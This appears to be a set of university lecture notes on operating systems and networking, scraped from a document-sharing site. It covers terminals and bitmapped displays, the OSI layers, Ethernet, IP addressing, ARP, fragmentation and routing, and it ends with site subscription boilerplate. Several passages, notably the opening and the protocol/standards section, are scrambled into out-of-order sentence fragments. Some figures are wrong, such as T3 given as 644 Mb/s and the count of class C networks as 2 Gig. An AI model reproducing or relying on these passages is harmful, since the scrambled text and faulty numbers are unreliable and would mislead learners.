the requests internally. the OS should detect hardware features and either disable the ones that are replicated in the OS. transient errors can be ignored. The solution is to make sure that the hardware and OS are aware of what the other is doing. are predictors of future woe. In most cases. Hardware is getting smarter. consider the disk interleaving case. Errors that are resolved by this are transient errors. but from the memory. and burning algorithms in hardware makes them hard to change. it’s likely that the sector or the disk itself is wearing out.

As we have seen, for every scheduling algorithm there is a counter scheduling strategy that confuses it. If your workload is a counter strategy for the algorithms wired into your hardware, performance will suffer. Frequently its; faster to tune or recode an algorithm in the OS than in hardware, but if you can’t disable the smart feature of the hardware, you’re sunk.

Terminals Terminal is a generic term for the keyboard/screen pair through which much of the computer input in the world today occurs. In times past, this was largely through serial line (RS-232) terminals that passed data a bit at a time, although these days a large number of terminals are intelligent or memory mapped (or both). The console keyboard, screen and mouse of a PC or workstation fall into the latter category. Serial terminals process data conceptually process data a character or line at a time. (In reality, data may be transmitted a bit at a time down the serial wire, but the device generally collects 7 or 8 bit words to work with.) Particularly intelligent terminals may have data stream editing capabilities built in, or they may be provided by the device driver. When we say character editing capabilities, we mean everything from cursor control to simple character erasures. To effect such editing, the device driver often collects characters as the keyboard transmits them, only committing the characters to the standard input of the running process when the enter key is sent. Smart terminals may do the same thing in the hardware. For output terminals have a simple language for output functions. A particular string of nonprinting characters may serve to move the output cursor (the point at which the next character will be output) to a given position or to clear or scroll areas of the screen1. The device driver is responsible for arranging for canonical output control sequences to be translated into the specific sequences that the terminal hardware understands. Even in a world of windowing systems and GUIs, the concept of a terminal is useful for its simplicity and power. The concepts carry over to line-driven modem systems and other simple devices. For example Coke machines.2 On the other end of the spectrum are bit-mapped displays and modern graphics processors. A bitmapped display has its drawing memory directly accessible to the diver in a way that allows the driver to draw graphics on the screen directly. Coupled with a pointing device this allows completely graphically oriented User interfaces (GUIs). The screen driver directly draws the windows and other screen cues that allow a user to navigate the GUI. There are usually routines either in the kernel or in user libraries to facilitate such constructs. The interface contains simple interface elements (called Widgets or Gadgets or other things depending on whether you’re on an X machine, an Amiga or some lesser machine). These libraries create the visual cues for the user and respond to events generated by the pointer driver. The pointer driver keeps track of the user’s reference point into the bit-mapped display used to manipulate GUI elements. The driver receives interrupts from the pointer whenever the pointer device is moves changing the location of the reference point. Generally any motion results in an interrupt, so the ISRs to follow the pointer must be quick. Most pointers supply only relative motion events; the device driver must track the reference point and update the gui element indicating its location.3 202

The pointer and drawing routines work together to provide an event stream to the OS and applications which the applications can then use to get user input. Events are asynchronous notifications that contain information like “the use has activated button number 5” or “the reference pointer is over slider 2.” The exact mechanisms of delivering events vary widely, and this class won’t really discuss them in detail. Hopefully your understanding of IPC already has given you some ideas: a record-based file of events; signals that carry additional information; monitors with procedures defined for various events. 1. 1 Some terminals allow individual pixels to be addressed or vectors drawn for graphics capabilities. 2. Some devices like touch screens and graphics pads do give absolute coordinate locations. Beyond bit mapped displays are terminals with graphics co-processors. These are dedicated processors that do nothing but render detailed images on the terminal, perhaps employing sophisticated lighting and texture effects. The language used to communicate with such processors may be very intricate and more resembles programming a multiprocessor than running a peripheral. We won’t discuss these in detail either, but again your experiences with interprocess communication should give you some ideas of the interfaces in use here. Locks and semaphores to control access to the lists of polygons to be drawn by the co-processor but arranged by the main CPU, for example. Context switching a color map on the co-processor when the reference point moves from one window to another, etc. There are other devices in the world, too that we won’t have time to investigate. Sound recording and playback systems that input and output sampled streams of data that have to be filtered in real time. Network adapters that need to fragment and reassemble large data blocks into small ones to be transferred across a network (and that may have to determine a route across such a network). Other stranger things.


The network layer connects hosts on different physical networks. It extends the ideas of addressing, naming, and routing to their global extreme. The headers added to the network layer are independent of the Network hardware The network layer solves some difficult distributed problems, e.g., how to store routes from every host to every host efficiently. Actually, it just makes sure that certain routers in the network know enough to sent the packet the right general direction, with each router knowing more about its local area. I don’t have time to really address these problems in this class, but I strongly advise you to check out one of the networking classes to find out for yourself. Computer Networking is becoming a bigger and bigger issue every day. It’s a versatile and inexpensive way to share resources and trade data. This section addresses the basic OS issues involved in communicating between computers. Network vs. System Domain host router host router host router host network 204

host That’s the same diagram from our discussion of the I/O system, only relabeled to represent a computer network. Some of the issues are remarkably similar. The system still has to address: • • Asynchrony: Events on different hosts are not synchronized. Data corruption and reordering: Reordering is similar to the problem of multiplexing responses, and is handled the same way. Data in the packets can be used to order data. Because there are more sources of error in the network, the OS has to address errors directly. Buffering: Each host is responsible for queuing data until the interested process retrieves it, similar to the way disk blocks are queued. There are some significant differences between a network and a hardware system, though: Autonomy: Individual pieces of hardware in a system are all controlled by the same entity, the owner of the machine or the CPU. In a network, each host may be an autonomous (or selfcontrolling) entity, with goals that may be in direct opposition of other hosts and no central authority to which to appeal to resolve conflicts. If this wasn’t enough to worry about in the abstract, there is the problem of two communicating entities sitting in different human domains. The legal requirements on the hardware or even the data content are often at issue. Latency: The latency between a CPU and a disk is a few tens of milliseconds at worst, and this is perceived as a glacial pace. The round trip time to a geosynchronous satellite and back is a quarter second. There are documented reports of packets taking minutes to get from host to host in the Internet. The latencies are often considerably higher in a network. But sometimes they are lower. Hosts on an uncontested LAN sometimes use a distributed file system to reduce disk latency. The range of latencies with which systems have to contend in networks is the issue. Connectivity Richness: In a physical box, there are only so many elements that can sit physically on one bus, so the CPU need only concern itself with a few entities. There are millions of computers connected to the Internet. Systems have to exhibit vastly different scaling properties in networks.

Basic Concepts
Because there are so many more elements connected sparsely, issues of naming, addressing, and routing become paramount. It’s important to grasp the distinction between a name, an address, and a route. Names are a convenient way for humans (or programs) to refer to an entity. My name is Ted; my computer’s name is vermouth.isi.edu. In both cases this is just a convenient string of characters that refers to a physical entity. Addresses are a special kind of name that can be used to plot a path to reach one of the entities. My address in Madison Wisconsin was 765 W. Washington Ave. #302 Madison, WI 53715. My computer’s address is . These names are special because they can be used to convey information to the place they name. (Not all things that are namable have an address).


In some sense. Routing information taxes the ability of hardware to store and search it. for example.1 This is only possible because the system was designed to scale to global sizes. 206 . you can’t usually tell what order they were sent. the receiver accepts or rejects the address. and routing system is nothing short of phenomenal. is under assault from lawyers. and there are different maxima and minima for the various packet parameters. A protocol is a set of rules that communicating entities follow in order to communicate meaningfully. Of course. the receiver acknowledges it. although as we’ll see. The mailer identifies itself. Depending on the underlying hardware and its associated protocols they may be fixed or variable length. the notion that the various transmissions (words. If your system claims to exchange RFC822-compliant mail2. The final basic distinction to draw is between connection-oriented an connectionless communications. or even if they bear any relation to each other . A route to my computer from a computer at USC would be a list of the IP addresses to pass through in order.the address space may not be large enough. the mailer tells who the mail is from. A packet is like a disk block . addressing. exchanging electronic mail requires a sequence of exchanges between the mailing machine and the receiving (or forwarding) machine.even if sent between the same 2 people. However. Defining and allocating these entities is one of the most difficult parts of networking. Even at that cracks are showing .it’s an element of data exchanged between 2 hosts. addresses and routes are the only entities that are required for networking. For example the electronic mail protocol above has been sanctioned by the Internet Engineering Task Force (IETF). if your mailer doesn’t conform to the standard but sends mail without losing any. that can be an illusion. and finally the message is exchanged and acknowledged. That set of rules is a protocol. For example. of course.this is called conforming to the standard. It’s best to think of them as atomic elements of networking. and the receiver again accepts or rejects. Postal addresses form a similar if less structured name/address/route space. Internet standards are presented in Request For Comments documents . Protocols give rise to standards. another word that net workers use a lot is packet. And the one that we had working. A standard is a formal presentation of a protocol that has been sanctioned by some official body. two units of transmission (2 letters) have no relation to each other. On a phone call. it must follow those rules . This is exactly the difference between the post office and the phone system. the only thing that happens is that you can’t put an RFC822-compliant sticker on it. The words that go in one end of the phone are not arbitrarily reordered. The Internet is not the only such system. because they represent an agreement between major practitioners of the field. In the mail. but having names is so useful that most general purpose networking systems have some mechanism. naming. the mailer tells who the mail it to.Routes are a description of how to convey information between two addresses. There’s no state that ties them together. The impressive part of the internet is that the space is well enough defined that machines can move the data with minimal per-message human intervention. or different family members talking) have some relation that is encapsulated by the idea of a call. 2. If you send them to the same place on the same day. That the Internet provides a global (in the purest sense of that word) naming. 1. Another basic concept that underlies networking is the protocol. A route to my address in Wisconsin from USC would be the sets of interstate highways and side streets to use to get from here to there.RFC for short. conforming to standards provide a loose guarantee that systems interoperate.

each layer adds a header to outgoing packets. If that happens. an X. The scope of names. Each type of hardware has it’s own standard: there’s an Ethernet standard. The protocols guarantee that every host gets the token eventually. Conceptually. As a tool for understanding the various issues in networking. Numbering layers from the bottom up. the CD is that even listening beforehand. they both stop transmitting and remain silent for a random time period before trying again.There are networks that support both these paradigms. yet the mail is transferred using TCP. As a model for implementation. 207 . The Seven Layer Model The seven layer model is the OSI (an international standards body) model for designing networking. which means that each host listens to the shared line and doesn’t send until the line is silent. and I won’t discuss it in any great detail. Like the shell in Lord of the Flies. They tell you what kinds of hardware to buy. this is very nice. Tokens generally have a fixed lifetime so that a host can only transmit for a given time period before it is forced to relinquish the token and passs it to the next host. begin transmitting. the token allows the holder the right to send uninterrupted. Medium access is the process of determining which host has the right to send information on the shared medium. The time they remain silent gets geometrically larger. Ethernet uses CSMA/CD (Carrier Sense Medium Access/Collision Detection). but think more seriously about what you’re doing before you implement something this way. but we’ll see that some servcies are replicated and some don’t fit neatly into a layer. FDDI (Fiber Distributed Digitial Interface) and token rings use tokens. and strips them off incoming packets before passing the packet up or down the stack as the case may be. In fact each can be supported by the other electronic mail is connectionless in the sense that each piece of mail has no ordering relative to others. Conceptually. and have their signals collide. That’s the CSMA. it’s not bad. addresses and routes is therefore constrained. This is very nuts and bolts electrical (or optical!) engineering stuff. Other medium access methods involve passing a token from host to host. an outgoing packet would have headers: Physical The physical layer specifies the format of bits on the wire and what kinds of wire you can use. its possible for 2 hosts far enough apart to hear the line clear. Link The link layer describes the protocols used by communicating nodes connected by the same physical hardware. There are many ways to do this. and what you’d see if you hooked up an oscilliscope (or spectrum analyzer) to the medium. Link layers are also the first layer that detects (and potentially recovers from) transmission errors. and a bunch more. the link layer is responsible for medium access. a connection-oriented protocol. The each level of the stack takes provides services to layers above it using building blocks provided by layers below it. how far apart nodes have to be (or must be). In a shared medium network3.25 standard. it’s a recipe for a slow network. a FDDI standard. We’ll use it to talk about protocol design.

This is usually accomplished by including a checksum in each packet. A checksum is a mathematical function that depends on the full contents of the packet, like the one-way functions used for authentication. Upon receiving the packet, a host will recomputed the function (assuming the checksum field to be 0) and unless it gets the same answer as the packet contained, reject the packet. Ethernets are a shared medium because many hosts use the same wire to communicate, while dile up modems are a point-to-point medium because the connections directly connect only 2 hosts. I’d use the party line analogy, but I fear that no one of an age to read or hear this knows what one is. Choosing a good checksum is a difficult tradeoff. The more effective the checksum is at detecting errors, the slower it is to calculate. Because the checksum must be calculated for every packet, the speed of calculating it can determine the network speed. The science of constructing efficient strong checksums is interesting in its own right. Some link layers correct errors, either by labeling the packets and acknowledging each packet receipt and retransmitting packets if there is no acknowledgement in a reasonable time. Another approach is to send redundant data and reconstruct damaged packets. This idea is also used in disk drive arrays, like RAID. You’ll hear more about it in CS 555. Transport The transport layer provides link layer style guarantees at across the network layer. For example transport resends lost packets and prevents reordering. Similar techniques to the link layer are used for these. Transport also provides demultiplexing within the computer systems. The network layer can name, address and route to a given computer. Within the computer, the transport layer provides a way to name, address and route to given processes. Transport is also the layer that addresses global performance of the network, for example congestion control and resource allocations. Session: The session layer provides further multiplexing, control over which endpoint is sending data, and some check pointing behavior. It’s not often used. It’s something of an open question if this functionality is important. Presentation: This layer is responsible for reformatting data between machines, and providing data-based semantics. Converting floating point formats between hosts or only returning packets that contain a given type field are things that fall under Presentation’s umbrella. Like the Session layer, Presentation isn’t often used. Application: These are protocols designed to carry out some useful, conrete service. SMTP the email protocol -is an application layer protocol. So is HTTP (although it’s extending its tenticles into Session and Presentation as well). These are also standardized; there are lengthy documents on what a valid HTTP request looks like or on what behavior an FTP server has to support. They’re dry reading, but important to interoperability. 208

Other Global Issues
I probably won’t have time to talk about these in detail, but other netwoking issues include: • • • • • • Scalable Naming Authentication and Security Network Management Other Communication models - broadcast & multicast Performance tuning of protocols Active Networking

Networking Note Networking deals with interconnected groups of machines talking with each other. Is a very different field than operating systems. Have a lot of standards stuff because everyone must agree on what to do when connect machines together. What is a network? A collection of machines, links and switches set up so that machines can communicate with each other. Some examples: • • • Telephone system. Machines are telephones, links are the telephone lines and switches are the phone switches. Ethernet. Machines are computers, there is one link (the ethernet) and no switches. Internet. Machines are computers, there are multiple links, both long-haul and local-area links. The switches are gateways.

Message may have to traverse multiple links and multiple switches to go from source to destination. Circuit-switched versus Packet-switched networks. Basic disadvantage of circuit-switched Networks - cannot use resources flexibly. Basic advantage of circuit-switched networks - deliver a uaranteed resource. Basic Networking Concepts: • • • • • • • Packetization. Addressing. Routing. Buffering. Congestion. Flow control. Unreliable Delivery. 209


Local Area Networks. Connect machines in a fairly close geographic area. Standard for many years: Ethernet. Standardized by Xerox, Intel and DEC in 1978. Still in wide use. Physical hardware technology: coax cable about 1/2 inch thick. Maximum length: 500 meters. Can extend with repeaters. Can only have two repeaters between any two machines, so maximum length is 1500 meters. Vampire taps to connect machines to Ethernet. Attach an ethernet transceiver to tap; the transceiver does the connection between the Ethernet and the host interface. The host interface then connects to the host machine. Ethernet is 10 Mbps bus with distributed access control. It is a broadcast medium - all transceivers see all packets and pass all packets to host interface. The host interface chooses packets the host should receive and discards others. Access scheme: Carrier sense multiple access with collision detection. Each access point senses carrier wave to figure out if machine is idle. To transmit, waits until carrier is idle, then starts transmitting. Each transmission consists of a packet; there is a maximum packet size. Collision detection and recovery. Transceivers monitor carrier during transimission to detect interference. Interference can happen if two transceivers start sending at same time. If interference happens, transceiver detects a collision. When collision detected, uses a binary exponential back off policy to retry the send. Adds on a random delay to avoid synchronized retries. Is there a fixed bound on how long it will take a packet to get successfully transmitted? Is any packet guaranteed to be transmitted at all? Addressing. Each host interface has a hardware address built into it. Addresses are 48 bits long. When change host interface hardware, address changes. Are three kinds of addresses: • • • Physical address of one network interface. Broadcast address for the network. (All 1's). Multicast addresses for a subset of machines on network.

Host interface looks at all packets on the ethernet. It passes a packet on to the host if the address in the packet matches its physical address or the broadcast address. Some host interfaces can also recognize several multicast addresses, and pass packets with those addresses on to the host. How do vendors avoid ethernet physical address clashes? Buy blocks of addresses from a central authority. Packet (frame) format. • • Preamble. 64 bits of alternating 1 and 0, to synchronize receivers. Destination address. 48 bits. 210

• • • •

Source address. 48 bits. Packet type. 16 bits. Helps OS route packets. Data. 368-120000 bits. CRC. 32 bits.

Ethernet frames are self-identifying. Can just look at frame and know what to do with it. Can multiplex multiple protocols on same machine and network without problems. CRC lets machine identify corrupted packets. Token-ring networks. Alternative to ethernet style networks. Arrange network in a ring, and pass a token around that lets machine transmit. Message flows around network until reaches destination. Some problems: long latency, token regeneration. ARPANET. Ancestor of current Internet. Long-haul packet-switched network. Consisted of about 50 C30 and C300 BBN computers in US and Europe connected by long-haul leased data lines. All computers are dedicated packet-switching machines (PSNs). Interesting fact: ARPANET, like highway system, was initially a DOD project set up officially for defense purposes. In original ARPANET, each computer connected to ARPANET connected directly to a PSN. Each packet contained address of destination machine and PSN network routed the packet to that machine. Now this is totally impractical and have a much more complex local structure before get onto Internet. Design of Internet driven by several factors. • • Will have multiple networks. Different vendors compete, plus have different technical tradeoffs for local area, wide area and long haul networks. People want universal interconnection.

Will have multiple networks around the world. An internet work, or internet, connects the different networks. So, job of internet is to route packets between networks. One goal of internet: Network transparency. Want to have a universal space of machine identifiers and refer to all machines on the internet using this universal space of machine identifiers. Do not want to impose a specific interconnection topology or hardware structure. Internet architecture. Connect two networks using a gateway machine. The job of the gateway is to route packets from one network to another. As network topologies become more complicated, gateways must understand how to route data through intermediate networks to reach final destination on a remote network. In Internet, gateways provide all interconnections between physical networks. All gateways route packets based on the network that the destination is on. Internet addressing. Each host on the Internet has a unique 32-bit address that is used for all Internet traffic to that host. Each internet address is a (netid, hosted) pair. The network identifies the network that the host is on; the hosted identifies the host within the network. 211

Bits 2-15: Netid. gateway must map to a 48 bit Ethernet address. First Bit: 0. leaving requesting authority to allocate host ids. with each integer representing one byte.edu .20 ecrc.use the net search functionality for RFC and you'll find pointers. 212 .org . cs.88. Mapping Internet addresses to Physical Network addresses. Class D. Given a 32 bit Internet address.36. Can have 16. Bits 24-31: Hostid. Bits 8-31: Hostid.de . a machine's internet address must change if it switches networks. If they are connected to destination network. Conceptually. Bits 0-2: 110.Three classes of Internet addresses: • • • • • Class A. Class B. Exceptions: gateways have multiple internet addresses.36 sri. • • • • • cs. Bits 3-23: Netid. Bits 0-1: 10. Bits 1-7: Netid. It just allocates network ids.mit.stanford.199.1. Four decimal integers.edu .edu .128.111.8. at least one per network that they are connected to.18. When machine receives packet. Dotted Decimal notation: Reading Internet addresses.0. Uses Address Resolution Protocol (ARP).5 Who assigns internet addresses? The Network Information Center! A centralized authority.384 Class B networks. make sure the packet gets delivered to correct machine on that network. Class E. it sends back a response containing its physical address.141.47 (what kind of network is it on). Gateways can extract network portion of address quickly.1 lcs. Class C. Gateway broadcasts a packet containing the Internet address of the machine that it wants to send the packet to. Because network id is encoded in Internet address.0. Can have 128 Class A networks. Can read them to figure out what is going on. Will discuss case when physical network is an Ethernet. an Internet address identifies a host. Interesting point: Whole structure of internet is available in RFC's (request for comments). (multicast addresses). Can have 2 Gig Class C networks. Used for Internet multicast. Bits 16-31: Hostid. Gateway uses physical address to send packet directly to machine.22.ucsb. Gateways have two responsibilies: • • Route packets based on network id to a gateway connected to that network. Reserved. Available over the Internet .1.26.41. Bits 0-3: 1110. Bits 0-3 1111.

Important fields in IP header: • • • VERS: protocol version.the packet delivery. IP datagram has header and data. 213 . could build a system that reassembled fragments when got to a physical network with a larger frame size. Usually reassembled only when fragments reach final destination. But must be able to route large packets through a network that only handles small packets . The internet conceptually has three kinds of services layered on top of each other: Connectionless. and application services. etc. reliable transport service. What if it is diskless? Contacts server and finds it out there using Reverse ARP (RARP).network transparency. In particular. Usually have a primary RARP server to avoid excessive traffic. RARP request is broadcasted to all machines on network. LEN: length of header. and looks there to find out when it boots up. The basic unit of transfer in the Internet is the IP datagram. Some networks may support large packets for performance. IP packets always travel from gateway to gateway across physical networks. in 32-bit words.Ross Finlayson. ARP request and response frames have specific type fields. How does a machine find out its Internet address? Store it on disk. But. the IP packet will be fragmented: chopped up into multiple physical packets. responses have 8035. RFC 903 . TOTAL LEN: total length of IP packet. while others can only route small packets. An ARP request has a type field of 0806. IP is the lowest level . must be reassembled back into a complete packet. unreliable packet delivery service. Once a packet has been fragmented.Also works for machines on same network even when they are not gateways. If the IP packet is larger than the physical network frame size. can have: • • • Lost Packets Duplicated Packets Out of order Packets Higher level software layered on top of IP deals with these conditions. Now switch to talking about IP . Standard set up by the Ethernet standard authority. IP is designed to deal with this situation and provides for fragmentation.the Internet Protocol. Internet makes a best effort attempt to deliver each datagram. Why is there a need for possibility of fragmentation? No good way to impose a uniform packet size on all networks. Use a address resolution cache to eliminate ARP traffic. but does not deal with error cases. Header contains internet addresses and the Internet routes IP datagrams based on Internet addresses in header. Should not prevent some networks from using large packets just because there exists a network somewhere in the world that can not handle large packets. RARP server looks at physical address of requestor and sends it a RARP response containing the internet address.

Required to deal with things like cycles in routing. Useful for debugging and other cases in which Internet should be forced to use a certain route. Can specify a specific route for each host. and pass others along to a default router. all defaults point to a router that knows how to route ALL packets. Host-specific routes. TTL: time to live. Routing IP datagrams. Use IDENT and SOURCE IP ADDRESS to identify the original datagram to which the fragment belongs. How are routing tables acquired and maintained? There are a lot of different protocols. Every time a gateway forwards the packet. but the basic idea is that the gateways send messages back and forth advertising routes. Specify a default next gateway to be used if other routing algorithms don't give a route. Each gateway has a table indexed by destination network id. Table driven routing. How to decide which path for which datagram? Routing for hosts on same network. Each advertisement says that a specific network is reachable via N hops.0 marks end of datagram. How many hops the packet may take without getting removed from Internet. • • • How to reassemble a fragmented packet? Allocate a buffer for each packet. FLAGS: A do not fragment flag (dangerous) and a more fragments flag . Eventually. Realize that are on same network by looking a notified of Internet address. There are multiple possible paths between hosts in an internet.gives offset of this fragment in original datagram. Used mostly for debugging. etc. Use more fragments flag to find end of original datagram. Default routes. source maintains a global counter it increments for every IP datagram sent. They know how to route some packets. Each gateway must decide next gateway to send datagram to. FRAGMENT OFFSET . Some protocols also include 214 . Do example on page 82. The source specifies the route in the datagram. Routing for hosts on different networks. DEST IP ADDRESS: IP address of destination machine.• • • SOURCE IP ADDRESS: IP address of source machine. • Most routers use a combination of table driven routing and default routing. • • • Source routing. Use the FRAGMENT OFFSET field to write each fragment into correct spot in the buffer. it decrements this field. Typically. and just use underlying physical network. IDENT: packet identifier. Use some mechanism to make sure all fragments arrived before consider datagram complete. Gateways pass datagrams from network to network until reach a gateway connected to destination network. Unique for each source. Each table entry tells where to send datagrams destined for that network.

Internet views whole organization as having one network.information about the different hops. So. GGP messages allow gateways to exchange pairs of messages.distributed shortest path algorithm may take a long time to converge.000 per year for its internet access. Lines may be T3 (644 Mb/s) lines. Chief threat to Internet links these days is backhoes. partition gateways into two groups. and it pays $23. If a link goes away. Sprint. Each message advertises that the sender can reach a given network N in D hops. Gateway runs a local shortest path computation to build its tables. Famous case: Harvard gateway bug. Each NAP is a very fast router connected via high-capacity lines to other gateways and NAPs. Typically big communications companies (MCI. so are vulnerable to one backhoe. not bombs. Later algorithm (SPF) replicated a complete database of network topology in every gateway. ATT) own the lines. The organization itself chops the host part of IP address up into a pair of local network and local host. have internet providers. In current Internet. Receiver compares its current route to the new route through the sender. The gateways use the route advertisements to build routing tables. Internet was originally designed to survive military attacks. the network should be able to route around the failure and still deliver packets. There are 4 Network Access Providers. UCSB buys its internet access from CERFNET. The internet provider can then turn around and sell internet access to whoever wants to buy it. All of the UC schools will band together and buy internet access from MCI. The routers talk a route advertisement protocol and implement some routing algorithm. Lines are typically fiber. and updates its tables to use the new route if it is better. In practice doesn't always work as well as designed. Core gateways have complete information about routes. routing tables change in response to changes in the network. Original core gateways used a protocol called GGP (Gateway to Gateway Protocol) to update routing tables. the UCSB CS department has more than 10 networks. and the fourth byte is the host on that network. Core and noncore gateways. For example. getting more bandwidth but at a higher price. Organizations go to internet providers to get access to the internet. so there are too many networks in the world to give every network an Internet address. In original internet. Memory fault caused it to advertise a 0 hop route to everybody! Problem with GGP . An internet provider buys a bunch of routers (usually from Cisco) and leases a bunch of lines. Organizations tend to chop their communications up into multiple networks. The whole system has switched over to private enterprise. 215 . Common error is routing all of the links that are supposed to give physical redundancy in the same fiber run. The internet provider must also buy access to a NAP or to a gateway that leads to a NAP. The solution is subnetting. Instead. UCSB has one class B Internet network. It has lots of physical redundancy and its routing algorithm is very dynamic and resilient to change. The third byte of every IP address identifies a local network. A top-down view of system. For example. there is no longer any central backbone or authority.

all of UCSB has only one network. and route the packet within the UCSB domain. Inside UCSB. 216 . there is a set of networks connected by routers. These routers interpret the IP address as containing a local network identifier and a host on that network. Internet routes to UCSB gateway based on Internet network id. The routers periodically advertise routes using a protocol called RIP. As far as the Internet is concerned.All IP packets from outside come to one UCSB gateway (by default). then routers within UCSB route based on the subnet id. This is an example of hierarchical routing.

Sign up to vote on this title
UsefulNot useful

Master Your Semester with Scribd & The New York Times

Special offer for students: Only $4.99/month.

Master Your Semester with a Special Offer from Scribd & The New York Times

Cancel anytime.